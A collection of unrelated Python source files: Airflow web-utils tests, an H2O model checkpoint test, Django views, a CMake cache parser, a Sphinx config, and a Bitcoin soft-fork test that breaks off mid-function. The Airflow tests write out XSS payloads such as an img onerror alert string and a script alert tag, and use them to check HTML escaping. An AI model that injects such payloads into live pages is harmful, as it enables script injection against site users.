:param previous_properties: Previous service properties (for MODIFIED
and MODIFIED_ENDMATCH events)
"""
self.__kind = kind
self.__reference = reference
if previous_properties is not None \
and not isinstance(previous_properties, dict):
# Accept None or dict() only
previous_properties = {}
self.__previous_properties = previous_properties
def __str__(self):
"""
String representation
"""
return "ServiceEvent({0}, {1})".format(self.__kind, self.__reference)
def get_previous_properties(self):
"""
        Returns the previous values of the service properties, meaningless if
        the event is neither MODIFIED nor MODIFIED_ENDMATCH.
:return: The previous properties of the service
"""
return self.__previous_properties
def get_service_reference(self):
"""
Returns the reference to the service associated to this event
:return: A ServiceReference object
"""
return self.__reference
def get_kind(self):
"""
Returns the kind of service event (see the constants)
:return: the kind of service event
"""
return self.__kind
@Deprecated("ServiceEvent: get_type() must be replaced by get_kind()")
def get_type(self):
"""
**DEPRECATED:** Use get_kind() instead
Retrieves the kind of service event.
"""
return self.__kind
|
import unittest
from datetime import datetime
from unittest import mock
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
from parameterized import parameterized
from airflow.www import utils
from tests.test_utils.config import conf_vars
class TestUtils(unittest.TestCase):
def test_empty_variable_should_not_be_hidden(self):
self.assertFalse(utils.should_hide_value_for_key(""))
self.assertFalse(utils.should_hide_value_for_key(None))
def test_normal_variable_should_not_be_hidden(self):
self.assertFalse(utils.should_hide_value_for_key("key"))
def test_sensitive_variable_should_be_hidden(self):
self.assertTrue(utils.should_hide_value_for_key("google_api_key"))
def test_sensitive_variable_should_be_hidden_ic(self):
self.assertTrue(utils.should_hide_value_for_key("GOOGLE_API_KEY"))
def check_generate_pages_html(self, current_page, total_pages,
window=7, check_middle=False):
extra_links = 4 # first, prev, next, last
search = "'>\"/><img src=x onerror=alert(1)>"
html_str = utils.generate_pages(current_page, total_pages,
search=search)
self.assertNotIn(search, html_str,
"The raw search string shouldn't appear in the output")
self.assertIn('search=%27%3E%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E',
html_str)
self.assertTrue(
callable(html_str.__html__),
"Should return something that is HTML-escaping aware"
)
dom = BeautifulSoup(html_str, 'html.parser')
self.assertIsNotNone(dom)
ulist = dom.ul
ulist_items = ulist.find_all('li')
self.assertEqual(min(window, total_pages) + extra_links, len(ulist_items))
page_items = ulist_items[2:-2]
mid = int(len(page_items) / 2)
for i, item in enumerate(page_items):
a_node = item.a
href_link = a_node['href']
node_text = a_node.string
if node_text == str(current_page + 1):
if check_middle:
self.assertEqual(mid, i)
self.assertEqual('javascript:void(0)', href_link)
self.assertIn('active', item['class'])
else:
self.assertRegex(href_link, r'^\?', 'Link is page-relative')
query = parse_qs(href_link[1:])
self.assertListEqual(query['page'], [str(int(node_text) - 1)])
self.assertListEqual(query['search'], [search])
def test_generate_pager_current_start(self):
self.check_generate_pages_html(current_page=0,
total_pages=6)
def test_generate_pager_current_middle(self):
self.check_generate_pages_html(current_page=10,
total_pages=20,
check_middle=True)
def test_generate_pager_current_end(self):
self.check_generate_pages_html(current_page=38,
total_pages=39)
def test_params_no_values(self):
"""Should return an empty string if no params are passed"""
self.assertEqual('', utils.get_params())
def test_params_search(self):
self.assertEqual('search=bash_',
utils.get_params(search='bash_'))
@parameterized.expand([
(True, False, ''),
(False, True, ''),
(True, True, 'showPaused=True'),
(False, False, 'showPaused=False'),
(None, True, ''),
(None, False, ''),
])
def test_params_show_paused(self, show_paused, hide_by_default, expected_result):
with conf_vars({('webserver', 'hide_paused_dags_by_default'): str(hide_by_default)}):
self.assertEqual(expected_result,
utils.get_params(showPaused=show_paused))
@parameterized.expand([
(True, False, True),
(False, True, True),
(True, True, False),
(False, False, False),
(None, True, True),
(None, False, True),
])
def test_should_remove_show_paused_from_url_params(self, show_paused,
hide_by_default, expected_result):
with conf_vars({('webserver', 'hide_paused_dags_by_default'): str(hide_by_default)}):
self.assertEqual(
expected_result,
utils._should_remove_show_paused_from_url_params(
show_paused,
hide_by_default
)
)
def test_params_none_and_zero(self):
query_str = utils.get_params(a=0, b=None)
# The order won't be consistent, but that doesn't affect behaviour of a browser
pairs = list(sorted(query_str.split('&')))
self.assertListEqual(['a=0', 'b='], pairs)
def test_params_all(self):
query = utils.get_params(showPaused=False, page=3, search='bash_')
self.assertEqual(
{'page': ['3'],
'search': ['bash_'],
'showPaused': ['False']},
parse_qs(query)
)
def test_params_escape(self):
self.assertEqual('search=%27%3E%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E',
utils.get_params(search="'>\"/><img src=x onerror=alert(1)>"))
def test_open_maybe_zipped_normal_file(self):
with mock.patch(
'io.open', mock.mock_open(read_data="data")) as mock_file:
utils.open_maybe_zipped('/path/to/some/file.txt')
mock_file.assert_called_once_with('/path/to/some/file.txt', mode='r')
def test_open_maybe_zipped_normal_file_with_zip_in_name(self):
path = '/path/to/fakearchive.zip.other/file.txt'
with mock.patch(
'io.open', mock.mock_open(read_data="data")) as mock_file:
utils.open_maybe_zipped(path)
mock_file.assert_called_once_with(path, mode='r')
@mock.patch("zipfile.is_zipfile")
@mock.patch("zipfile.ZipFile")
def test_open_maybe_zipped_archive(self, mocked_zip_file, mocked_is_zipfile):
mocked_is_zipfile.return_value = True
instance = mocked_zip_file.return_value
instance.open.return_value = mock.mock_open(read_data="data")
utils.open_maybe_zipped('/path/to/archive.zip/deep/path/to/file.txt')
mocked_is_zipfile.assert_called_once_with('/path/to/archive.zip')
mocked_zip_file.assert_called_once_with('/path/to/archive.zip', mode='r')
instance.open.assert_called_once_with('deep/path/to/file.txt')
def test_state_token(self):
        # It shouldn't be possible to set these odd values anymore, but let's
        # ensure they are escaped!
html = str(utils.state_token('<script>alert(1)</script>'))
self.assertIn(
'<script>alert(1)</script>',
html,
)
self.assertNotIn(
'<script>alert(1)</script>',
html,
)
def test_task_instance_link(self):
from airflow.www.app import cached_appbuilder
with cached_appbuilder(testing=True).app.test_request_context():
html = str(utils.task_instance_link({
'dag_id': '<a&1>',
'task_id': '<b2>',
'execution_date': datetime.now()
}))
self.assertIn('%3Ca%261%3E', html)
self.assertIn('%3Cb2%3E', html)
self.assertNotIn('<a&1>', html)
self.assertNotIn('<b2>', html)
def test_dag_link(self):
from airflow.www.app import cached_appbuilder
with cached_appbuilder(testing=True).app.test_request_context():
html = str(utils.dag_link({
'dag_id': '<a&1>',
'execution_date': datetime.now()
}))
self.assertIn('%3Ca%261%3E', html)
self.assertNotIn('<a&1>', html)
def test_dag_run_link(self):
from airflow.www.app import cached_appbuilder
with cached_appbuilder(testing=True).app.test_request_context():
html = str(utils.dag_run_link({
'dag_id': '<a&1>',
'run_id': '<b2>',
'execution_date': datetime.now()
}))
self.assertIn('%3Ca%261%3E', html)
self.assertIn('%3Cb2%3E', html)
self.assertNotIn('<a&1>', html)
self.assertNotIn('<b2>', html)
class TestAttrRenderer(unittest.TestCase):
def setUp(self):
self.attr_renderer = utils.get_attr_renderer()
def test_python_callable(self):
def example_callable(unused_self):
print("example")
rendered = self.attr_renderer["python_callable"](example_callable)
self.assertIn('"example"', rendered)
def test_python_callable_none(self):
rendered = self.attr_renderer["python_callable"](None)
self.assertEqual("", rendered)
def test_markdown(self):
markdown = "* foo\n* bar"
rendered = self.attr_renderer["doc_md"](markdown)
self.assertIn("<li>foo</li>", rendered)
self.assertIn("<li>bar</li>", rendered)
def test_markdown_none(self):
rendered = self.attr_renderer["python_callable"](None)
self.assertEqual("", rendered)
|
import sys, os
sys.path.insert(1, "../../../")
import h2o, tests
import random
def milsong_checkpoint():
milsong_train = h2o.upload_file(h2o.locate("bigdata/laptop/milsongs/milsongs-train.csv.gz"))
milsong_valid = h2o.upload_file(h2o.locate("bigdata/laptop/milsongs/milsongs-test.csv.gz"))
distribution = "gaussian"
# build first model
ntrees1 = random.sample(range(50,100),1)[0]
max_depth1 = random.sample(range(2,6),1)[0]
min_rows1 = random.sample(range(10,16),1)[0]
print "ntrees model 1: {0}".format(ntrees1)
print "max_depth model 1: {0}".format(max_depth1)
print "min_rows model 1: {0}".format(min_rows1)
model1 = h2o.gbm(x=milsong_train[1:],y=milsong_train[0],ntrees=ntrees1,max_depth=max_depth1, min_rows=min_rows1,
distribution=distribution,validation_x=milsong_valid[1:],validation_y=milsong_valid[0])
# save the model, then load the model
path = os.path.normpath(os.path.join(os.path.dirname(os.path.realpath(__file__)),"..","..","results"))
assert os.path.isdir(path), "Expected save directory {0} to exist, but it does not.".format(path)
model_path = h2o.save_model(model1, path=path, force=True)
assert os.path.isdir(model_path), "Expected load directory {0} to exist, but it does not.".format(model_path)
restored_model = h2o.load_model(model_path)
# continue building the model
ntrees2 = ntrees1 + 50
max_depth2 = max_depth1
min_rows2 = min_rows1
print "ntrees model 2: {0}".format(ntrees2)
print "max_depth model 2: {0}".format(max_depth2)
print "min_rows model 2: {0}".format(min_rows2)
model2 = h2o.gbm(x=milsong_train[1:],y=milsong_train[0],ntrees=ntrees2,max_depth=max_depth2, min_rows=min_rows2,
distribution=distribution,validation_x=milsong_valid[1:],validation_y=milsong_valid[0],
checkpoint=restored_model._id)
# build the equivalent of model 2 in one shot
model3 = h2o.gbm(x=milsong_train[1:],y=milsong_train[0],ntrees=ntrees2,max_depth=max_depth2, min_rows=min_rows2,
distribution=distribution,validation_x=milsong_valid[1:],validation_y=milsong_valid[0])
if __name__ == "__main__":
tests.run_test(sys.argv, milsong_checkpoint)
|
"""Docstring for this file."""
__author__ = 'ismailsunni'
__project_name = 'watchkeeper'
__filename = 'reports'
__date__ = '8/4/15'
__copyright__ = 'imajimatika@gmail.com'
__doc__ = ''
import os
from django.contrib.auth.decorators import login_required
from django.shortcuts import render_to_response
from django.http import HttpResponse
from django.template import RequestContext
from event_mapper.models.daily_report import DailyReport
@login_required
def reports(request):
"""View for request."""
daily_reports = DailyReport.objects.all().order_by('-date_time')
return render_to_response(
'event_mapper/reports/reports_page.html',
{
'daily_reports': daily_reports
},
context_instance=RequestContext(request)
)
def download_report(request, report_id):
"""The view to download users data as CSV.
:param request: A django request object.
:type request: request
:return: A PDF File
:type: HttpResponse
"""
report = DailyReport.objects.get(id=report_id)
    fsock = open(report.file_path, 'rb')  # binary mode for the PDF payload
response = HttpResponse(fsock, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="%s"' % (
os.path.basename(report.file_path)
)
return response
|
from __future__ import unicode_literals
import sorl.thumbnail.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fundraising', '0014_donation_receipt_email'),
]
operations = [
migrations.AlterField(
model_name='djangohero',
name='logo',
field=sorl.thumbnail.fields.ImageField(upload_to='fundraising/logos/', blank=True),
preserve_default=True,
),
]
|
from __future__ import with_statement
import os, sys, re
from Path import Path
COMMENT = re.compile( r"//|#" )
WS = re.compile( r"\s" )
class CacheEntry( object ):
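    """One entry of a CMakeCache.txt file.
    Cache lines have the form 'NAME:TYPE=VALUE', e.g.
    'CMAKE_BUILD_TYPE:STRING=Release'. Blank lines and comment lines
    (starting with // or #) produce entries that evaluate to False, so
    callers can filter them out."""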
def __init__( self, _line ):
line = WS.sub( "", str( _line ) )
if not line:
return None
elif COMMENT.match( line ):
return None
else:
# get rid of comments at the end of the line
line = COMMENT.split( line, 1 )[0].strip()
try:
name_type, value = line.split( '=' )
self._value = value.strip()
if self._value == '':
self._value = None
name, typ = name_type.split( ':' )
self._name = name.strip()
self._type = typ.strip()
except ValueError:
sys.stderr.write( "Could not parse line '%s'\n" % _line )
self._value = None
self._name = None
self._type = None
def __str__( self ):
val = ""
typ = ""
if self._value != None:
val = self._value
if self._type != None:
typ = self._type
if self._name == None:
return ""
else:
s = "%s:%s=%s" % ( self._name, typ, val )
return s.strip()
def __eq__( self, other ):
return str( self ) == str( other )
def __nonzero__( self ):
try:
return self._name != None and self._value != None
except AttributeError:
return False
def name( self ):
return self._name
    def value( self, newval = None ):
        # With no argument, return the current value; with an argument,
        # set the value instead (returning None).
        if newval != None:
            self._value = newval
        else:
            return self._value
def hint( self ):
"""Return the CMakeCache TYPE of the entry; used as a hint to CMake
GUIs."""
return self._type
class CMakeCache( object ):
"""This class is used to read in and get programmatic access to the
variables in a CMakeCache.txt file, manipulate them, and then write the
cache back out."""
def __init__( self, path=None ):
self._cachefile = Path( path )
_cachefile = str( self._cachefile )
self._entries = {}
if self._cachefile.exists():
with open( _cachefile ) as c:
entries = filter( None, map( lambda x: CacheEntry( x ),
c.readlines() ) )
entries = filter( lambda x: x.value() != None, entries )
for i in entries:
self._entries[i.name()] = i
def __contains__( self, thingy ):
try:
return thingy in self.names()
except TypeError:
return thingy in self._entries.values()
    def __iter__( self ):
        return iter( self._entries )
def __nonzero__( self ):
return len( self._entries ) > 0
def __str__( self ):
return os.linesep.join( map( lambda x: str( x ), self.entries() ) )
def add( self, entry ):
e = CacheEntry( entry )
if e:
if not e in self:
self._entries[e.name()] = e
else:
sys.stderr.write( "Entry for '%s' is already in the cache.\n" % \
e.name() )
else:
sys.stderr.write( "Could not create cache entry for '%s'\n" % e )
def update( self, entry ):
e = CacheEntry( entry )
if e:
self._entries[e.name()] = e
else:
sys.stderr.write( "Could not create cache entry for '%s'\n" % e )
def names( self ):
return self._entries.keys()
def entries( self ):
return self._entries.values()
def get( self, name ):
return self._entries[name]
def cachefile( self ):
return self._cachefile
def refresh( self ):
self.__init__( self._cachefile )
def write( self, newfile = None ):
if newfile == None:
newfile = self._cachefile
with open( newfile, 'w' ) as f:
for e in self.entries():
f.write( str( e ) + os.linesep )
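# Example usage (illustrative; the path and variable are placeholders):
#   cache = CMakeCache( "build/CMakeCache.txt" )
#   if "CMAKE_BUILD_TYPE" in cache:
#       cache.update( "CMAKE_BUILD_TYPE:STRING=Release" )
#   cache.write()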
|
from amonone.core.collector.collector import system_info_collector, process_info_collector
from amonone.core import settings
from amonone.utils.dates import unix_utc_now
import sys
class Runner(object):
def system(self):
system_info_dict = {}
memory = system_info_collector.get_memory_info()
cpu = system_info_collector.get_cpu_utilization()
loadavg = system_info_collector.get_load_average()
disk = system_info_collector.get_disk_usage()
network = system_info_collector.get_network_traffic()
uptime = system_info_collector.get_uptime()
if memory != False:
system_info_dict['memory'] = memory
if cpu != False:
system_info_dict['cpu'] = cpu
if loadavg != False:
system_info_dict['loadavg'] = loadavg
if disk != False:
system_info_dict['disk'] = disk
if network != False:
system_info_dict['network'] = network
if uptime != False:
system_info_dict['uptime'] = uptime
system_info_dict['time'] = unix_utc_now()
return system_info_dict
def processes(self):
process_checks = process_info_collector.process_list()
process_info_dict = {}
for process in process_checks:
command = process["command"]
command = command.replace(".", "")
del process["command"]
process_info_dict[command] = process
process_info_dict['time'] = unix_utc_now()
return process_info_dict
def distribution_info(self):
distribution_info = system_info_collector.get_system_info()
return distribution_info
runner = Runner()
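# Example (illustrative): one snapshot of system metrics. Keys such as 'cpu'
# or 'memory' are present only when the corresponding collector succeeded;
# 'time' is always set.
#   data = runner.system()
#   print data.get('cpu'), data.get('loadavg')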
|
import sys, os
sys.path.insert(0, os.path.abspath('..'))
import redcap
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.viewcode',
'sphinx.ext.autosummary', 'numpydoc']
numpydoc_show_class_members = False
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'PyCap'
copyright = u'2012, Scott Burns'
version = redcap.__version__
release = version
exclude_patterns = ['_build']
pygments_style = 'flask_theme_support.FlaskyStyle'
html_theme = 'default'
html_static_path = ['_static']
html_show_sourcelink = False
htmlhelp_basename = 'PyCapdoc'
latex_elements = {
}
latex_documents = [
('index', 'PyCap.tex', u'PyCap Documentation',
u'Scott Burns', 'manual'),
]
man_pages = [
('index', 'pycap', u'PyCap Documentation',
[u'Scott Burns'], 1)
]
texinfo_documents = [
('index', 'PyCap', u'PyCap Documentation',
u'Scott Burns', 'PyCap', 'One line description of project.',
'Miscellaneous'),
]
sys.path.append(os.path.abspath('_themes'))
html_theme_path = ['_themes']
|
"""Test activation of the first version bits soft fork.
This soft fork will activate the following BIPS:
BIP 68 - nSequence relative lock times
BIP 112 - CHECKSEQUENCEVERIFY
BIP 113 - MedianTimePast semantics for nLockTime
regtest lock-in with 108/144 block signalling
activation after a further 144 blocks
mine 82 blocks whose coinbases will be used to generate inputs for our tests
mine 61 blocks to transition from DEFINED to STARTED
mine 144 blocks only 100 of which are signaling readiness in order to fail to change state this period
mine 144 blocks with 108 signaling and verify STARTED->LOCKED_IN
mine 140 blocks and seed the block chain with the 82 inputs we will use for our tests at height 572
mine 3 blocks and verify still at LOCKED_IN and test that enforcement has not triggered
mine 1 block and test that enforcement has triggered (which triggers ACTIVE)
Test BIP 113 is enforced
Mine 4 blocks so next height is 580 and test BIP 68 is enforced for time and height
Mine 1 block so next height is 581 and test BIP 68 now passes time but not height
Mine 1 block so next height is 582 and test BIP 68 now passes time and height
Test that BIP 112 is enforced
Various transactions will be used to test that the BIPs rules are not enforced before the soft fork activates
And that after the soft fork activates transactions pass and fail as they should according to the rules.
For each BIP, transactions of versions 1 and 2 will be tested.
----------------
BIP 113:
bip113tx - modify the nLocktime variable
BIP 68:
bip68txs - 16 txs with nSequence relative locktime of 10 with various bits set as per the relative_locktimes below
BIP 112:
bip112txs_vary_nSequence - 16 txs with nSequence relative_locktimes of 10 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_nSequence_9 - 16 txs with nSequence relative_locktimes of 9 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_OP_CSV - 16 txs with nSequence = 10 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112txs_vary_OP_CSV_9 - 16 txs with nSequence = 9 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112tx_special - test negative argument to OP_CSV
"""
from decimal import Decimal
from itertools import product
from io import BytesIO
import time
from test_framework.blocktools import create_coinbase, create_block, create_transaction
from test_framework.messages import ToHex, CTransaction
from test_framework.mininode import P2PDataStore
from test_framework.script import (
CScript,
OP_CHECKSEQUENCEVERIFY,
OP_DROP,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
get_bip9_status,
hex_str_to_bytes,
)
BASE_RELATIVE_LOCKTIME = 10
SEQ_DISABLE_FLAG = 1 << 31
SEQ_RANDOM_HIGH_BIT = 1 << 25
SEQ_TYPE_FLAG = 1 << 22
SEQ_RANDOM_LOW_BIT = 1 << 18
def relative_locktime(sdf, srhb, stf, srlb):
"""Returns a locktime with certain bits set."""
locktime = BASE_RELATIVE_LOCKTIME
if sdf:
locktime |= SEQ_DISABLE_FLAG
if srhb:
locktime |= SEQ_RANDOM_HIGH_BIT
if stf:
locktime |= SEQ_TYPE_FLAG
if srlb:
locktime |= SEQ_RANDOM_LOW_BIT
return locktime
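# Worked example of the encoding above: relative_locktime(True, False, True, False)
# returns 10 | SEQ_DISABLE_FLAG | SEQ_TYPE_FLAG = 0x8040000A. Per BIP 68 the low
# 16 bits carry the locktime value (10), bit 22 selects time-based (512-second
# units) rather than height-based locks, and bit 31 disables the lock entirely.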
def all_rlt_txs(txs):
return [tx['tx'] for tx in txs]
def sign_transaction(node, unsignedtx):
rawtx = ToHex(unsignedtx)
signresult = node.signrawtransactionwithwallet(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def create_bip112special(node, input, txversion, address):
tx = create_transaction(node, input, address, amount=Decimal("49.98"))
tx.nVersion = txversion
signtx = sign_transaction(node, tx)
signtx.vin[0].scriptSig = CScript([-1, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
return signtx
def send_generic_input_tx(node, coinbases, address):
return node.sendrawtransaction(ToHex(sign_transaction(node, create_transaction(node, node.getblock(coinbases.pop())['tx'][0], address, amount=Decimal("49.99")))))
def create_bip68txs(node, bip68inputs, txversion, address, locktime_delta=0):
"""Returns a list of bip68 transactions with different bits set."""
txs = []
assert(len(bip68inputs) >= 16)
for i, (sdf, srhb, stf, srlb) in enumerate(product(*[[True, False]] * 4)):
locktime = relative_locktime(sdf, srhb, stf, srlb)
tx = create_transaction(node, bip68inputs[i], address, amount=Decimal("49.98"))
tx.nVersion = txversion
tx.vin[0].nSequence = locktime + locktime_delta
tx = sign_transaction(node, tx)
tx.rehash()
txs.append({'tx': tx, 'sdf': sdf, 'stf': stf})
return txs
def create_bip112txs(node, bip112inputs, varyOP_CSV, txversion, address, locktime_delta=0):
"""Returns a list of bip68 transactions with different bits set."""
txs = []
assert(len(bip112inputs) >= 16)
for i, (sdf, srhb, stf, srlb) in enumerate(product(*[[True, False]] * 4)):
locktime = relative_locktime(sdf, srhb, stf, srlb)
tx = create_transaction(node, bip112inputs[i], address, amount=Decimal("49.98"))
if (varyOP_CSV): # if varying OP_CSV, nSequence is fixed
tx.vin[0].nSequence = BASE_RELATIVE_LOCKTIME + locktime_delta
else: # vary nSequence instead, OP_CSV is fixed
tx.vin[0].nSequence = locktime + locktime_delta
tx.nVersion = txversion
signtx = sign_transaction(node, tx)
if (varyOP_CSV):
signtx.vin[0].scriptSig = CScript([locktime, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
else:
signtx.vin[0].scriptSig = CScript([BASE_RELATIVE_LOCKTIME, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
tx.rehash()
txs.append({'tx': signtx, 'sdf': sdf, 'stf': stf})
return txs
class BIP68_112_113Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [['-whitelist=127.0.0.1', '-blockversion=4', '-addresstype=legacy']]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def generate_blocks(self, number, version, test_blocks=None):
if test_blocks is None:
test_blocks = []
for i in range(number):
block = self.create_test_block([], version)
test_blocks.append(block)
self.last_block_time += 600
self.tip = block.sha256
self.tipheight += 1
return test_blocks
def create_test_block(self, txs, version=536870912):
block = create_block(self.tip, create_coinbase(self.tipheight + 1), self.last_block_time + 600)
block.nVersion = version
block.vtx.extend(txs)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
return block
def sync_blocks(self, blocks, success=True, reject_code=None, reject_reason=None, request_block=True):
"""Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.
Call with success = False if the tip shouldn't advance to the most recent block."""
self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_code=reject_code, reject_reason=reject_reason, request_block=request_block)
def run_test(self):
self.nodes[0].add_p2p_connection(P2PDataStore())
self.log.info("Generate blocks in the past for coinbase outputs.")
long_past_time = int(time.time()) - 600 * 1000 # enough to build up to 1000 blocks 10 minutes apart without worrying about getting into the future
self.nodes[0].setmocktime(long_past_time - 100) # enough so that the generated blocks will still all be before long_past_time
self.coinbase_blocks = self.nodes[0].generate(1 + 16 + 2 * 32 + 1) # 82 blocks generated for inputs
self.nodes[0].setmocktime(0) # set time back to present so yielded blocks aren't in the future as we advance last_block_time
self.tipheight = 82 # height of the next block to build
self.last_block_time = long_past_time
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.nodeaddress = self.nodes[0].getnewaddress()
self.log.info("Test that the csv softfork is DEFINED")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'defined')
test_blocks = self.generate_blocks(61, 4)
self.sync_blocks(test_blocks)
self.log.info("Advance from DEFINED to STARTED, height = 143")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
self.log.info("Fail to achieve LOCKED_IN")
# 100 out of 144 signal bit 0. Use a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(50, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(20, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(24, 536936448, test_blocks) # 0x20010000 (signalling not)
self.sync_blocks(test_blocks)
self.log.info("Failed to advance past STARTED, height = 287")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
self.log.info("Generate blocks to achieve LOCK-IN")
# 108 out of 144 signal bit 0 to achieve lock-in
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(58, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(26, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(10, 536936448, test_blocks) # 0x20010000 (signalling not)
self.sync_blocks(test_blocks)
self.log.info("Advanced from STARTED to LOCKED_IN, height = 431")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# Generate 140 more version 4 blocks
test_blocks = self.generate_blocks(140, 4)
self.sync_blocks(test_blocks)
# Inputs at height = 572
#
# Put inputs for all tests in the chain at height 572 (tip now = 571) (time increases by 600s per block)
# Note we reuse inputs for v1 and v2 txs so must test these separately
# 16 normal inputs
bip68inputs = []
for i in range(16):
bip68inputs.append(send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress))
# 2 sets of 16 inputs with 10 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112basicinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress))
bip112basicinputs.append(inputs)
# 2 sets of 16 varied inputs with (relative_lock_time) OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112diverseinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress))
bip112diverseinputs.append(inputs)
# 1 special input with -1 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112specialinput = send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress)
# 1 normal input
bip113input = send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress)
self.nodes[0].setmocktime(self.last_block_time + 600)
inputblockhash = self.nodes[0].generate(1)[0] # 1 block generated for inputs to be in chain at height 572
self.nodes[0].setmocktime(0)
self.tip = int(inputblockhash, 16)
self.tipheight += 1
self.last_block_time += 600
assert_equal(len(self.nodes[0].getblock(inputblockhash, True)["tx"]), 82 + 1)
# 2 more version 4 blocks
test_blocks = self.generate_blocks(2, 4)
self.sync_blocks(test_blocks)
self.log.info("Not yet advanced to ACTIVE, height = 574 (will activate for block 576, not 575)")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# Test both version 1 and version 2 transactions for all tests
# BIP113 test transaction will be modified before each use to put in appropriate block time
bip113tx_v1 = create_transaction(self.nodes[0], bip113input, self.nodeaddress, amount=Decimal("49.98"))
bip113tx_v1.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v1.nVersion = 1
bip113tx_v2 = create_transaction(self.nodes[0], bip113input, self.nodeaddress, amount=Decimal("49.98"))
bip113tx_v2.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v2.nVersion = 2
# For BIP68 test all 16 relative sequence locktimes
bip68txs_v1 = create_bip68txs(self.nodes[0], bip68inputs, 1, self.nodeaddress)
bip68txs_v2 = create_bip68txs(self.nodes[0], bip68inputs, 2, self.nodeaddress)
# For BIP112 test:
# 16 relative sequence locktimes of 10 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_v1 = create_bip112txs(self.nodes[0], bip112basicinputs[0], False, 1, self.nodeaddress)
bip112txs_vary_nSequence_v2 = create_bip112txs(self.nodes[0], bip112basicinputs[0], False, 2, self.nodeaddress)
# 16 relative sequence locktimes of 9 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_9_v1 = create_bip112txs(self.nodes[0], bip112basicinputs[1], False, 1, self.nodeaddress, -1)
bip112txs_vary_nSequence_9_v2 = create_bip112txs(self.nodes[0], bip112basicinputs[1], False, 2, self.nodeaddress, -1)
# sequence lock time of 10 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_v1 = create_bip112txs(self.nodes[0], bip112diverseinputs[0], True, 1, self.nodeaddress)
bip112txs_vary_OP_CSV_v2 = create_bip112txs(self.nodes[0], bip112diverseinputs[0], True, 2, self.nodeaddress)
# sequence lock time of 9 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_9_v1 = create_bip112txs(self.nodes[0], bip112diverseinputs[1], True, 1, self.nodeaddress, -1)
bip112txs_vary_OP_CSV_9_v2 = create_bip112txs(self.nodes[0], bip112diverseinputs[1], True, 2, self.nodeaddress, -1)
# -1 OP_CSV OP_DROP input
bip112tx_special_v1 = create_bip112special(self.nodes[0], bip112specialinput, 1, self.nodeaddress)
bip112tx_special_v2 = create_bip112special(self.nodes[0], bip112specialinput, 2, self.nodeaddress)
self.log.info("TESTING")
self.log.info("Pre-Soft Fork Tests. All txs should pass.")
self.log.info("Test version 1 txs")
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = sign_transaction(self.nodes[0], bip113tx_v1)
success_txs.append(bip113signed1)
success_txs.append(bip112tx_special_v1)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v1))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v1))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v1))
self.sync_blocks([self.create_test_block(success_txs)])
